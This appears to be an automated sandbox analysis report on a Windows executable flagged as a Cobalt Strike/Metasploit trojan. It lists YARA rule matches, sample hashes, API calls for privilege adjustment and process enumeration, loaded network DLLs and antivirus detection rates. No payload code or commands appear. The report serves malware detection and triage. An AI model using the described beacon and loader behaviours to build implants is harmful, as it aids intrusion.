Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 Author: unknown
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Rule for beacon reflective loader Author: unknown
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike payload Author: ditekSHen
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D7411E _memset,GetStartupInfoA,GetCurrentDirectoryW,GetCurrentDirectoryW,GetCurrentDirectoryW,CreateProcessWithLogonW,GetLastError,

0_2_03D7411E

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D943C0	0_2_03D943C0
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D82BF1	0_2_03D82BF1
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D92A9D	0_2_03D92A9D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D92271	0_2_03D92271
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D95210	0_2_03D95210
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D919C8	0_2_03D919C8
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D949E5	0_2_03D949E5
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D91E9D	0_2_03D91E9D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D9267D	0_2_03D9267D
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D94C40	0_2_03D94C40
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03D87C14	0_2_03D87C14
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03991ACB	0_2_03991ACB
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_039912EB	0_2_039912EB
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0399408E	0_2_0399408E
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_039A2802	0_2_039A2802
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0398203F	0_2_0398203F
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03987062	0_2_03987062
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_039916BF	0_2_039916BF
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03991EEB	0_2_03991EEB
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_03990E16	0_2_03990E16
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: 0_2_0399465E	0_2_0399465E

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: String function: 03D881DC appears 39 times
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Code function: String function: 0398762A appears 35 times

Source: vNenBbeRFZ.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 0.2.vNenBbeRFZ.exe.3d70000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Shellcode_Generic_8c487e57 os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Shellcode.Generic, fingerprint = 834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4, id = 8c487e57-4b8c-488e-a1d9-786ff935fd2c, last_modified = 2022-07-18
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_38b8ceec os = windows, severity = x86, description = Identifies the API address lookup function used by metasploit. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 44b9022d87c409210b1d0807f5a4337d73f19559941660267d63cd2e4f2ff342, id = 38b8ceec-601c-4117-b7a0-74720e26bf38, last_modified = 2021-08-23
Source: 00000000.00000002.4136642076.0000000000110000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_24338919 os = windows, severity = x86, description = Identifies metasploit wininet reverse shellcode. Also used by other tools (like beacon)., creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = ac76190a84c4bdbb6927c5ad84a40e2145ca9e76369a25ac2ffd727eefef4804, id = 24338919-8efe-4cf2-a23a-a3f22095b42d, last_modified = 2021-08-23
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4137199343.0000000003DA4000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137083362.0000000003970000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Trojan_Raw_Generic_4 date_created = 2020-12-02, rev = FireEye, date_modified = 2020-12-02, md5 = f41074be5b423afb02a74bc74222e35d
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
Source: 00000000.00000002.4137199343.0000000003D70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
Source: Process Memory Space: vNenBbeRFZ.exe PID: 6476, type: MEMORYSTR	Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1/0@0/1

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D73751 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,

0_2_03D73751

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Code function: 0_2_03D78FCB _memset,GetCurrentProcess,CreateToolhelp32Snapshot,Process32First,CloseHandle,CloseHandle,OpenProcess,ProcessIdToSessionId,CloseHandle,Process32Next,CloseHandle,

0_2_03D78FCB

Source: vNenBbeRFZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vNenBbeRFZ.exe	ReversingLabs: Detection: 92%
Source: vNenBbeRFZ.exe	Virustotal: Detection: 84%

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: wininetlui.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\vNenBbeRFZ.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Users\user\Desktop\vNenBbeRFZ.exe

